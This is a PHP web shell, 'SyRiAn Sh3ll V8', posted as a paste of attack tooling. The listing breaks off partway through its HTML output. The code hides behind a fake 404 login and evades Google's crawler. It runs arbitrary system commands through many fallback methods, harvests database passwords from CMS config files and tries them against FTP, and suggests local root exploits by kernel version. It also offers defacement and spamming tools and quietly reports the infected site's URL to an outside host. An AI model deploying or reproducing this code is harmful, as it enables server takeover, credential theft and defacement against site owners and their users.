· 10 years ago · Oct 22, 2015, 07:10 AM
1<?php
2# .. SyRiAn Sh3ll V8 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
3# ,--^----------,--------,-----,-------^--,
4# | ||||||||| `--------' | O .. SyRiAn Sh3ll V8 ....
5# `+---------------------------^----------|
6# `\_,-------, __EH << SyRiAn | 34G13__|
7# / XXXXXX /`| /
8# / XXXXXX / `\ /
9# / XXXXXX /\______(
10# / XXXXXX /!
11# / XXXXXX /! rep0rt bugz t0: sy34[at]msn[dot]com
12# (________(!
13# `-------'
14#.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
15#.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
16#
17# SyRiAn Sh3ll V8 .
18# Copyright (C) 2012 - SyRiAn 34G13
19# This program is free software; you can redistribute it and/or modify
20# it under the terms of the GNU General Public License as published by
21# the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
22# This program is distributed in the hope that it will be useful,
23# but WITHOUT ANY WARRANTY; without even the implied warranty of
24# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25# I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
26
27# Coders :
28# SyRiAn_34G13 : sy34@msn.com [ Main Coder ] .
29# SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
30# Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
31$auth_pass = "af6b25c85dc62c1bea158631cb9aaa62";
32$color = "#00ff00";
33$default_action = 'FilesMan';
34@define('SELF_PATH', __FILE__);
35if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
36 header('HTTP/1.0 404 Not Found');
37 exit;
38}
39@session_start();
40@error_reporting(0);
41@ini_set('error_log',NULL);
42@ini_set('log_errors',0);
43@ini_set('max_execution_time',0);
44@set_time_limit(0);
45@set_magic_quotes_runtime(0);
46@define('VERSION', '2.1');
47if( get_magic_quotes_gpc() ) {
48 function stripslashes_array($array) {
49 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
50 }
51 $_POST = stripslashes_array($_POST);
52}
53function printLogin() {
54 ?>
55<h1>Not Found</h1>
56<p>The requested URL was not found on this server.</p>
57<hr>
58<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
59 <style>
60 input { margin:0;background-color:#fff;border:1px solid #fff; }
61 </style>
62 <center>
63 <form method=post>
64 <input type=password name=pass>
65 </form></center>
66 <?php
67 exit;
68}
69if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
70 if( empty( $auth_pass ) ||
71 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
72 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
73 else
74 printLogin();
75
76$shellColor = '#990000'; // Shell Color
77#------------------------------------#
78# Powered By SyRiAn Shell #
79# By EH SyRiAn 34G13 #
80# Version 8 - priv8 #
81# Made In SyRiA #
82#------------------------------------#
83?>
84<?php
85if($_GET['id']== 'logout')
86{
87 Logout();
88}
89# ---------------------------------------#
90# SuiCide #
91#----------------------------------------#
92if($_GET['id'] == 100)
93{
94 echo "<body onload='Suicide();'>";
95}
96if($_GET['id'] == 'Delete')
97{
98 Suicide();
99}
100# ---------------------------------------#
101# Functions #
102#----------------------------------------#
103function input($type,$name,$value,$size)
104{
105 if (empty($value))
106 {
107 print "<input type=$type name=$name size=$size>";
108 }
109 elseif(empty($name)&&empty($size))
110 {
111 print "<input type=$type value=$value >";
112 }
113 elseif(empty($size))
114 {
115 print "<input type=$type name=$name value=$value >";
116 }
117 else
118 {
119 print "<input type=$type name=$name value=$value size=$size >";
120 }
121}
122function read_dir($path,$username)
123{
124 if ($handle = opendir($path))
125 {
126 while (false !== ($file = readdir($handle)))
127 {
128 $fpath="$path$file";
129 if (($file!='.') and ($file!='..'))
130 {
131 if (is_readable($fpath))
132 {
133 $dr="$fpath/";
134 if (is_dir($dr))
135 {
136 read_dir($dr,$username);
137 }
138 else
139 {
140 if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
141
142($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
143 {
144 $pass=get_pass($fpath);
145 if ($pass!='')
146 {
147 echo "[+] $fpath\n$pass\n";
148 ftp_check($username,$pass);
149 }
150 }
151 }
152 }
153 }
154 }
155 }
156}
157function get_pass($link)
158{
159 @$config=fopen($link,'r');
160 while(!feof($config))
161 {
162 $line=fgets($config);
163 if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
164 {
165 if (strrpos($line,'"'))
166 $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
167 else
168 $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
169 return $pass;
170 }
171 }
172}
173function GetRealIP()
174{
175$ch = curl_init();
176curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
177$urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
178curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
179curl_setopt($ch, CURLOPT_REFERER, $urls);
180$html = curl_exec($ch);
181 if (getenv(HTTP_X_FORWARDED_FOR))
182 {
183 $ip=getenv(HTTP_X_FORWARDED_FOR);
184 }
185 elseif (getenv(HTTP_CLIENT_IP))
186 {
187 $ip=getenv(HTTP_CLIENT_IP);
188 }
189 else
190 {
191 $ip=getenv(REMOTE_ADDR);
192 }
193 return $ip;
194}
195function openBaseDir()
196{
197$openBaseDir = ini_get("open_basedir");
198if (!$openBaseDir)
199 {
200 $openBaseDir = '<font color="green">OFF</font>';
201 }
202 else
203 {
204 $openBaseDir = '<font color="red">ON</font>';
205 }
206 return $openBaseDir;
207}
208function str_hex($string)
209{
210 $hex='';
211 for ($i=0; $i < strlen($string); $i++)
212 {
213 $hex .= dechex(ord($string[$i]));
214 }
215 return $hex;
216}
217function SafeMode()
218{
219 $safe_mode = ini_get("safe_mode");
220 if (!$safe_mode)
221 {
222 $safe_mode = '<font color="green">OFF</font>';
223 }
224 else
225 {
226 $safe_mode = '<font color="red">ON</font>';
227 }
228 return $safe_mode;
229}
230function currentFileName()
231{
232 $currentFileName = $_SERVER["SCRIPT_NAME"];
233 $currentFileName = Explode('/', $currentFileName);
234 $currentFileName = $currentFileName[count($currentFileName) - 1];
235 return $currentFileName;
236}
237function Suicide()
238{
239 @unlink(currentFileName());
240}
241function rootxpL()
242{
243 $v=@php_uname();
244 $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
245
246h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
247
248krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
249
250krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
251
252ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
253
254uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2,
255
256ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
257
258kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
259
260uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
261 foreach($db as $k=>$x)if(strstr($v,$k))return $x;
262 if(!$xpl)$xpl='<font color="red">Not found.</font>';
263 return $xpl;
264}
265function PostgreSQL()
266{
267 if(@function_exists('pg_connect'))
268 {
269 $postgreSQL = '<font color="red">ON</font>';
270 }
271 else
272 {
273 $postgreSQL = '<font color="green">OFF</font>';
274 }
275 return $postgreSQL;
276}
277function Oracle()
278{
279 if(@function_exists('ocilogon'))
280 {
281 $oracle = '<font color="red">ON</font>';
282 }
283 else
284 {
285 $oracle = '<font color="green">OFF</font>';
286 }
287 return $oracle;
288}
289function ZoneH($url, $hacker, $hackmode,$reson, $site )
290{
291 $k = curl_init();
292 curl_setopt($k, CURLOPT_URL, $url);
293 curl_setopt($k,CURLOPT_POST,true);
294 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
295 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
296 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
297 $kubra = curl_exec($k);
298 curl_close($k);
299 return $kubra;
300}
301function MsSQL()
302{
303 if(@function_exists('mssql_connect'))
304 {
305 $msSQL = '<font color="red">ON</font>';
306 }
307 else
308 {
309 $msSQL = '<font color="green">OFF</font>';
310 }
311 return $msSQL;
312}
313function MySQL2()
314{
315 $mysql_try = function_exists('mysql_connect');
316 if($mysql_try)
317 {
318 $mysql = '<font color="red">ON</font>';
319 }
320 else
321 {
322 $mysql = '<font color="green">OFF</font>';
323 }
324 return $mysql;
325}
326function Gzip()
327{
328 if (function_exists('gzencode'))
329 {
330 $gzip = '<font color="red">ON</font>';
331 }
332 else
333 {
334 $gzip = '<font color="green">OFF</font>';
335 }
336 return $gzip;
337}
338function MysqlI()
339{
340 if (function_exists('mysqli_connect'))
341 {
342 $mysqli = '<font color="red">ON</font>';
343 }
344 else
345 {
346 $mysqli = '<font color="green">OFF</font>';
347 }
348 return $mysqli;
349}
350function MSQL()
351{
352 if (function_exists('msql_connect'))
353 {
354 $mSql = '<font color="red">ON</font>';
355 }
356 else
357 {
358 $mSql = '<font color="green">OFF</font>';
359 }
360 return $mSql;
361}
362function SQlLite()
363{
364 if (function_exists('sqlite_open'))
365 {
366 $SQlLite = '<font color="red">ON</font>';
367 }
368 else
369 {
370 $SQlLite = '<font color="green">OFF</font>';
371 }
372 return $SQlLite;
373}
374function tulis($file,$text)
375{
376 $textz = gzinflate(base64_decode($text));
377 if($filez = @fopen($file,"w"))
378 {
379 @fputs($filez,$textz); @fclose($file);
380 }
381}
382function RegisterGlobals()
383{
384 if(ini_get('register_globals'))
385 {
386 $registerg= '<font color="red">ON</font>';
387 }
388 else
389 {
390 $registerg= '<font color="green">OFF</font>';
391 }
392 return $registerg;
393}
394function HardSize($size)
395{
396 if($size >= 1073741824)
397 {
398 $size = @round($size / 1073741824 * 100) / 100 . " GB";
399 }
400 elseif($size >= 1048576)
401 {
402 $size = @round($size / 1048576 * 100) / 100 . " MB";
403 }
404 elseif($size >= 1024)
405 {
406 $size = @round($size / 1024 * 100) / 100 . " KB";
407 }
408 else
409 {
410 $size = $size . " B";
411 }
412 return $size;
413}
414function Curl()
415{
416 if(extension_loaded('curl'))
417 {
418 $curl = '<font color="red">ON</font>';
419 }
420 else
421 {
422 $curl = '<font color="green">OFF</font>';
423 }
424 return $curl;
425}
426function DecryptConfig()
427{
428 @include("DecryptConfig.php");
429 if($_POST['ScriptType'] == 'vb')
430 {
431 $dbName = $config['Database']['dbname'];
432 $prefix = $config['Database']['tableprefix'];
433 $email = $config['Database']['technicalemail'];
434 $host = $config['MasterServer']['servername'];
435 $port = $config['MasterServer']['port'];
436 $user = $config['MasterServer']['username'];
437 $pass = $config['MasterServer']['password'];
438 $admincp = $config['Misc']['admincpdir'];
439 $modecp = $config['Misc']['modcpdir'];
440 }
441 elseif($_POST['ScriptType'] == 'wp')
442 {
443 $dbName = DB_NAME;
444 $prefix = $table_prefix;
445 $host = DB_HOST;
446 $user = DB_USER;
447 $pass = DB_PASS;
448 }
449 elseif($_POST['ScriptType'] == 'jos')
450 {
451 $dbName = $db;
452 $prefix = $dbprefix;
453 $email = $mailfrom;
454 $host = $host;
455 $user = $user;
456 $pass = $password;
457 }
458 elseif($_POST['ScriptType'] == 'phpbb')
459 {
460 $host = $dbhost;
461 $port = $dbport;
462 $dbName = $dbname;
463 $user = $dbuser;
464 $pass = $dbpasswd;
465 $prefix = $table_prefix;
466 }
467 elseif($_POST['ScriptType'] == 'ipb')
468 {
469 $host = $INFO['sql_host'];
470 $dbName = $INFO['sql_database'];
471 $user = $INFO['sql_user'];
472 $pass = $INFO['sql_pass'];
473 $prefix = $INFO['sql_tbl_prefix'];
474 }
475 elseif($_POST['ScriptType'] == 'smf')
476 {
477 $dbName = $db_name;
478 $pass = $db_passwd;
479 $prefix = $db_prefix;
480 $host = $db_server;
481 $user = $db_user;
482 $email = $webmaster_email;
483 }
484 elseif($_POST['ScriptType'] == 'mybb')
485 {
486 $host = $config['database']['hostname'];
487 $user = $config['database']['username'];
488 $pass = $config['database']['password'];
489 $dbName = $config['database']['database'];
490 $prefix = $config['database']['table_prefix'];
491 $admincp = $config['admin_dir'];
492 $prefix = $config['database']['table_prefix'];
493 }
494
495 echo '
496#-------------------------------#
497# Config Informations #
498#-------------------------------#
499Host : '.$host.'
500DB Name : '.$dbName.'
501DB User : '.$user.'
502DB Pass : '.$pass.'
503Prefix : '.$prefix.'
504Email : '.$email.'
505Port : '.$port.'
506ACP : '.$admincp.'
507MCP : '.$modecp.'
508';
509}
510function footer()
511{
512 echo '<table bgcolor="#cccccc" width="100%"><tr>
513 <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
514 <center><font color="gray" size="-2"><b>
515
516
517 </font><font color="gray"></font><font color="#990000">
518 </font><font color="gray"></font><font color="#990000"> v8 Features;
519 </font></b>
520 </td>
521 </tr></table>
522 </tbody></table>
523 <a name="down"></a>
524 </body></html>
525 ';
526}
527function whereistmP()
528{
529 $uploadtmp=ini_get('upload_tmp_dir');
530 $uf=getenv('USERPROFILE');
531 $af=getenv('ALLUSERSPROFILE');
532 $se=ini_get('session.save_path');
533 $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
534 if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
535 if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
536 if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
537 if(is_dir($uf) && is_writable($uf))return $uf;
538 if(is_dir($af) && is_writable($af))return $af;
539 if(is_dir($se) && is_writable($se))return $se;
540 if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
541 if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
542 return '.';
543}
544function winshelL($command)
545{
546 $name=whereistmP()."\\".uniqid('NJ');
547 win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
548 sleep(1);
549 $exec=file_get_contents($name);
550 unlink($name);
551 return $exec;
552}
553function update()
554{
555 echo "[+] Update Has D0n3 ^_^";
556}
557function srvshelL($command)
558{
559 $name=whereistmP()."\\".uniqid('NJ');
560 $n=uniqid('NJ');
561 $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
562 win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
563 win32_start_service($n);
564 win32_stop_service($n);
565 win32_delete_service($n);
566 while(!file_exists($name))sleep(1);
567 $exec=file_get_contents($name);
568 unlink($name);
569 return $exec;
570}
571function ffishelL($command)
572{
573 $name=whereistmP()."\\".uniqid('NJ');
574 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
575 $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
576 while(!file_exists($name))sleep(1);
577 $exec=file_get_contents($name);
578 unlink($name);
579 return $exec;
580}
581function comshelL($command,$ws)
582{
583 $exec=$ws->exec("cmd.exe /c $command");
584 $so=$exec->StdOut();
585 return $so->ReadAll();
586}
587function perlshelL($command)
588{
589 $perl=new perl();
590 ob_start();
591 $perl->eval("system(\"$command\")");
592 $exec=ob_get_contents();
593 ob_end_clean();
594 return $exec;
595}
596function Exe($command)
597{
598 global $windows;
599 $exec=$output='';
600 $dep[]=array('pipe','r');$dep[]=array('pipe','w');
601 if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
602 elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
603 elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
604 elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
605 elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
606 elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
607
608$output;proc_close($res);}
609 elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
610 elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
611 elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
612 elseif(extension_loaded('perl'))$exec=perlshelL($command);
613 return $exec;
614}
615function magicQouts()
616{
617 $mag=get_magic_quotes_gpc();
618 if (empty($mag))
619 {
620 $mag = '<font color="green">OFF</font>';
621 }
622 else
623 {
624 $mag= '<font color="red">ON</font>';
625 }
626 return $mag;
627}
628function DisableFunctions()
629{
630 $disfun = ini_get('disable_functions');
631 if (empty($disfun))
632 {
633 $disfun = '<font color="green">NONE</font>';
634 }
635 return $disfun;
636}
637function SelectCommand($os)
638{
639 if($os == 'Windows')
640 {
641 echo "
642 <select name=alias >
643 <option value=''>NONE</option>
644 <option value='dir' >List Directory</option>
645 <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
646 <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir
647
648 </option>
649 <option value='netstat -an'>Show active connections</option>
650 <option value='net start'>Show running services</option>
651 <option value='tasklist'>Show Pro</option>
652 <option value='net user'>User accounts</option>
653 <option value='net view'>Show computers</option>
654 <option value='arp -a'>ARP Table</option>
655 <option value='ipconfig /all'>IP Configuration</option>
656 <option value='netstat -an'>netstat -an</option>
657 <option value='systeminfo'>System Informations</option>
658 <option value='getmac'>Get Mac Address</option>
659 </select>
660 ";
661 }
662 else
663 {
664 echo "
665 <select name=alias >
666 <option value=''>NONE</option>
667 <option value='ls -la'>List dir</option>
668 <option value='cat /etc/hosts'>IP Addresses</option>
669 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
670 <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
671 <option value='netstat -an | grep -i listen'>show opened ports</option>
672 <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
673 <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
674 <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
675 <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
676 <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
677 <option value='find / -type f -name \"config*\"'>find config* files</option>
678 <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
679 <option value='find / -perm -2 -ls'>find all writable folders and files</option>
680 <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
681 <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
682 <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
683 <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
684 <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
685 <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
686 <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
687 <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
688 <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
689 <option value='locate httpd.conf'>locate httpd.conf files</option>
690 <option value='locate vhosts.conf'>locate vhosts.conf files</option>
691 <option value='locate proftpd.conf'>locate proftpd.conf files</option>
692 <option value='locate psybnc.conf'>locate psybnc.conf files</option>
693 <option value='locate my.conf'>locate my.conf files</option>
694 <option value='locate admin.php'>locate admin.php files</option>
695 <option value='locate cfg.php'>locate cfg.php files</option>
696 <option value='locate conf.php'>locate conf.php files</option>
697 <option value='locate config.dat'>locate config.dat files</option>
698 <option value='locate config.php'>locate config.php files</option>
699 <option value='locate config.inc'>locate config.inc files</option>
700 <option value='locate config.inc.php'>locate config.inc.php</option>
701 <option value='locate config.default.php'>locate config.default.php files</option>
702 <option value='locate config'>locate config* files </option>
703 <option value='locate \'.conf\''>locate .conf files</option>
704 <option value='locate \'.pwd\''>locate .pwd files</option>
705 <option value='locate \'.sql\''>locate .sql files</option>
706 <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
707 <option value='locate \'.bash_history\''>locate .bash_history files</option>
708 <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
709 <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
710 <option value='locate backup'>locate backup files</option>
711 <option value='locate dump'>locate dump files</option>
712 <option value='locate priv'>locate priv files</option>
713 </select>
714 ";
715 }
716}
717function GenerateFile($name,$content)
718{
719 $file = @fopen($name,"w+");
720 @fwrite($file,$content);
721 @fclose($file);
722 return true;
723}
724function which($pr)
725{
726 $path = Exe("which $pr");
727 if(!empty($path))
728 {
729 return trim($path);
730 }
731 else
732 {
733 return trim($pr);
734 }
735}
736function checkfunctioN($func)
737{
738 global $disablefunctions,$safemode;
739 $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
740 if($safemode=='ON' && in_array($func,$safe))return 0;
741 elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
742 return 0;
743}
744function CSS($shellColor)
745{
746
747 $css = "
748 <html dir=rtl>
749 <head>
750 <title>SyRiAn Sh3ll ~ V8~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
751 <link rel=\"shortcut icon\" href='http://24.media.tumblr.com/a71961c928ec5820d3433f88d420815c/tumblr_mfjrabxQvr1s1u2k2o1_100.png' />
752 <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
753 <style>
754 BODY
755 {
756 FONT-FAMILY: Verdana;
757 margin: 2;
758 color: #cccccc;
759 background-color: #000000;
760 }
761 sy
762 {
763 color:".$shellColor.";
764 font-size:7pt;
765 font-weight: bold;
766 }
767 #Box
768 {
769 color:".$shellColor.";
770 font-size:14px;
771 background-color:#000;
772 font-weight:bold;
773 }
774 tr
775 {
776 BORDER-RIGHT: #cccccc 1px solid;
777 BORDER-TOP: #cccccc 1px solid;
778 BORDER-LEFT: #cccccc 1px solid;
779 BORDER-BOTTOM: #cccccc 1px solid;
780 color: #ffffff;
781 }
782 td
783 {
784 BORDER-RIGHT: #cccccc 1px solid;
785 BORDER-TOP: #cccccc 1px solid;
786 BORDER-LEFT: #cccccc 1px solid;
787 BORDER-BOTTOM: #cccccc 1px solid;
788 color: #cccccc;
789 }
790 .table1
791 {
792 BORDER: 1px none;
793 BACKGROUND-COLOR: #000000;
794 color: #333333
795 }
796 .td1
797 {
798 BORDER: 1px none;
799 color: #ffffff; font-style:normal;
800 font-variant:normal;
801 font-weight:normal;
802 font-size:7pt;
803 font-family:tahoma
804 }
805 .tr1
806 {
807 BORDER: 1px none;
808 color: #cccccc;
809 }
810 table
811 {
812 BORDER: #eeeeee outset;
813 BACKGROUND-COLOR: #000000;
814 color: #cccccc;
815 }
816 input
817 {
818 BORDER-RIGHT: ".$shellColor." 1px solid;
819 BORDER-TOP: ".$shellColor." 1px solid;
820 BORDER-LEFT: ".$shellColor." 1px solid;
821 BORDER-BOTTOM: ".$shellColor." 1px solid;
822 BACKGROUND-COLOR: #333333;
823 font: 9pt tahoma;
824 color: #ffffff;
825 }
826 select
827 {
828 BORDER-RIGHT: #ffffff 1px solid;
829 BORDER-TOP: #999999 1px solid;
830 BORDER-LEFT: #999999 1px solid;
831 BORDER-BOTTOM: #ffffff 1px solid;
832 BACKGROUND-COLOR: #000000;
833 font: 9pt tahoma;
834 color: #CCCCCC;;
835 }
836 submit
837 {
838 BORDER: 1px outset buttonhighlight;
839 BACKGROUND-COLOR: #272727;
840 width: 40%;
841 color: #cccccc;
842 }
843 textarea
844 {
845 BORDER-RIGHT: #ffffff 1px solid;
846 BORDER-TOP: #999999 1px solid;
847 BORDER-LEFT: #999999 1px solid;
848 BORDER-BOTTOM: #ffffff 1px solid;
849 BACKGROUND-COLOR: #333333;
850 color: #ffffff;
851 }
852 A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
853 A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
854 A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
855 A:hover {color:blue;TEXT-DECORATION: none}
856 </style>
857 <script type='text/javascript' src='http://static.tumblr.com/qo0gonz/zlSmfjpr7/jquery-1.6.1.min.js'>
858 function Suicide()
859 {
860 var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
861 if(confimrSuicide == true)
862 {
863 document.location='".currentFileName()."?id=Delete';
864 }
865 else {document.location='".currentFileName()."';}
866 }
867 </script>
868 </head>";
869 if($_GET['id'] == '')
870 {
871 $css .= "<script>window.location = '?id=mainPage';</script>";
872 }
873 return $css;
874}
875function Logout()
876{
877 print"<script>
878 document.cookie='user=';
879 document.cookie='pass=';
880 var url = window.location.pathname;
881 var filename = url.substring(url.lastIndexOf('/')+1);
882 window.location=filename;
883 </script>";
884}
885
886function About()
887{
888 $about = "
889<table bgcolor=#cccccc width=\"100%\">
890<tbody><tr><td width=1025>
891<div align=center><img src='http://24.media.tumblr.com/a71961c928ec5820d3433f88d420815c/tumblr_mfjrabxQvr1s1u2k2o1_100.png'><br>
892</div>
893<sy><div align=center>Coded By : EH << SyRiAn | 34G13</div></sy>
894<sy><div align=center>From </font>: SyRiAn Arabic Republic </div></sy>
895<sy><div align=center>Age : 4/1991<br></div></sy>
896<sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
897<sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
898<sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
899<br/>
900<center>
901<br/>
902<form method='POST'>
903<input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
904<textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
905<input type='submit' value='Submit' name='sendEmail' />
906</form></center>
907</td></tr></tbody></table>";
908return $about;
909}
910echo CSS($shellColor);
911# ---------------------------------------#
912# Some Info #
913#----------------------------------------#
914$dir = getcwd();
915$uname= @php_uname();
916if(strlen($dir)>1 && $dir[1]==":")
917$os = "Windows";
918else $os = "Linux";
919$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
920$server = @substr($SERVER_SOFTWARE,0,120);
921
922echo "
923<body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
924<p dir=ltr> </p>
925<div dir=ltr align=center><font size=4><b>
926<img border=0 src=http://24.media.tumblr.com/a71961c928ec5820d3433f88d420815c/tumblr_mfjrabxQvr1s1u2k2o1_100.png width=101 height=93> </b></font><div
927dir=ltr align=center><span style=height: 25px;><b>
928<font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V8</font></b><span style=font-size: 20pt; color:
929
930#990000><p></p></span></span></div></td><td
931bgcolor=#000000>
932<p dir=ltr><font size=1> <b>[<a href=?id=mainPage>Main</a>]</b></span>
933<font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
934<b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
935<b>[</span><a href=?id=about>About</a>]</b></span>
936<b>[</span><a href=?id=logout>Logout</a>]</b></span>
937<b>[</span><a href=?id=100>SuiCide</a>]</b></span>
938<br>
939<font size=1><br>
940 Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
941 System = <sy>".$os."</sy>
942 Magic_Quotes = <sy>". @magicQouts()." </sy>
943 Curl = <sy>".@Curl()." </sy>
944 Register Globals = <sy>".@RegisterGlobals()." </sy>
945 Open Basedir = <sy>".@openBaseDir()." </sy>
946<br>
947 Gzip = <sy>".@Gzip()."</sy>
948 MySQLI = <sy>".@MysqlI()." </sy>
949 MSQL = <sy>".@MSQL()."</sy>
950 SQL Lite = <sy>".@SQlLite()."</sy>
951 Usefull Locals = <sy>".rootxpL()." </sy>
952<br>
953 Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
954 Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
955 PHP Version = <sy>".@phpversion()." </sy>
956 Zend Version = <sy>".@zend_version()." </sy>
957 MySQL Version = <sy>".@mysql_get_server_info()." </sy>
958<br>
959 MySQL = ".MySQL2()."
960 MsSQL = ".MsSQL()."
